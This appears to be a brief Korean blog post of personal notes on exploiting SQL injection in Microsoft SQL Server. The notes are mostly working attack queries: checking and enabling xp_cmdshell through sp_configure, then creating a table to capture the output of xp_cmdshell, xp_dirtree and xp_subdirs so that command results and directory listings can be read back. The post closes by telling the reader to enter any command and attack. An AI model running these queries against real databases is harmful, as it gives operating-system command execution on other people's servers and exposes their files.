반응형
인젝션 쪽으로 사용하다가 필요한 내용 정리
1. mssql
- xp_cmdshell 활성화하기
인젝션이 가능하다는 전제 하에 xp_cmdshell 옵션 값 확인
select name, value from sys.configurations where name='xp_cmdshell'
이후 서브쿼리를 활용하여 아래 쿼리 실행, xp_cmdshell 활성화
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1
RECONFIGURE;
xp_cmdshell 결과를 확인하는 방법을 고민하다가 사용자 테이블을 만들어서 결과를 넣기로 함
테이블은 varchar로 만들면 뭔가 에러가 자꾸 났음 (두번째 인자가 옵셔널인데 자꾸 넣으라고 함)
그래서 그냥 ntext 타입으로 생성
create table in_test(paths ntext);--
insert in_test exec xp_dirtree 'c:',1;--
insert in_test exec xp_cmdshell 'cd',1;--
insert in_test exec xp_subdirs 'c:\\inetpub\\';--
원하는 명령어 입력 후 공격.
반응형